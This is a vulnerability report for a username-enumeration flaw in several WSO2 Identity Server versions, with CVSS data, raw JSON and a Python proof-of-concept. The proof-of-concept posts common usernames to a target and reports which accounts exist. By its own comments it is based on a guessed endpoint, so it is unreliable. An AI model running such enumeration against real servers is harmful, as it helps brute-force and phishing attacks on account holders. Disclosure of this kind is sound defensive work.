Security Vulnerability Report
CVE-2024-0391 CVSS 5.3 MEDIUM

Published: 2026-05-11 10:16:12
Last Modified: 2026-05-13 15:25:04
Source: ed10eef1-636d-4fbe-9993-6890dfa878f8

Description

The check user account lock states feature within the email OTP flow fails to validate user input, allowing an attacker to infer the existence of registered user accounts. The discovery of valid usernames can increase the risk of brute-force and social engineering attacks. Attackers can leverage this information to craft targeted phishing campaigns or other malicious activities aimed at tricking users into divulging sensitive data, potentially damaging the organization's reputation and leading to regulatory non-compliance and financial consequences.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No CPE configuration data available (vulnerability status: Awaiting Analysis). Affected products as listed:

WSO2 Identity Server 5.3.0
WSO2 Identity Server 5.4.0
WSO2 Identity Server 5.4.1
WSO2 Identity Server 5.5.0
WSO2 Identity Server 5.6.0
WSO2 Identity Server 5.7.0
WSO2 Identity Server 5.8.0
WSO2 Identity Server 5.9.0
WSO2 Identity Server 5.9.1
WSO2 Identity Server 5.10.0
WSO2 Identity Server 5.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def check_user_existence(target_url, username):
    # Hypothetical endpoint based on the vulnerability description
    endpoint = f"{target_url}/commonapi"
    # Payload typically includes the username for the OTP flow
    payload = {
        "username": username,
        "action": "checkAccountLock",
    }
    headers = {"Content-Type": "application/json"}
    try:
        # Sending POST request to the vulnerable endpoint
        # (verify=False disables TLS certificate checking, as in the original script)
        response = requests.post(endpoint, json=payload, headers=headers, verify=False)
        # Analyze the response to infer user existence.
        # Logic: if the response indicates 'locked' or a specific user state, the user exists;
        # if it says 'user not found' or returns a generic error, the user does not exist.
        # The 'not found' markers are checked first: a 200 status alone would otherwise
        # mask them and report every username as found.
        if "User not found" in response.text or "Invalid user" in response.text:
            print(f"[-] User Not Found: {username}")
            return False
        elif "Account is locked" in response.text or response.status_code == 200:
            print(f"[+] User Found: {username}")
            return True
        else:
            # Fallback for different response patterns
            print(f"[?] Uncertain response for {username}: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"Error connecting to target: {e}")
        return False


# Example usage
if __name__ == "__main__":
    target = "https://target-wso2-server.com"
    user_list = ["admin", "administrator", "test", "user1"]
    for user in user_list:
        check_user_existence(target, user)
```

References

https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3115/ (vendor advisory WSO2-2024-3115)
Raw JSON Data

```json
{"cve": {"id": "CVE-2024-0391", "sourceIdentifier": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "published": "2026-05-11T10:16:11.593", "lastModified": "2026-05-13T15:25:04.383", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The check user account lock states feature within the email OTP flow fails to validate user input, allowing an attacker to infer the existence of registered user accounts.\n\nThe discovery of valid usernames can increase the risk of brute-force and social engineering attacks. Attackers can leverage this information to craft targeted phishing campaigns or other malicious activities aimed at tricking users into divulging sensitive data, potentially damaging the organization's reputation and leading to regulatory non-compliance and financial consequences."}], "metrics": {"cvssMetricV31": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "references": [{"url": "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3115/", "source": "ed10eef1-636d-4fbe-9993-6890dfa878f8"}]}}
```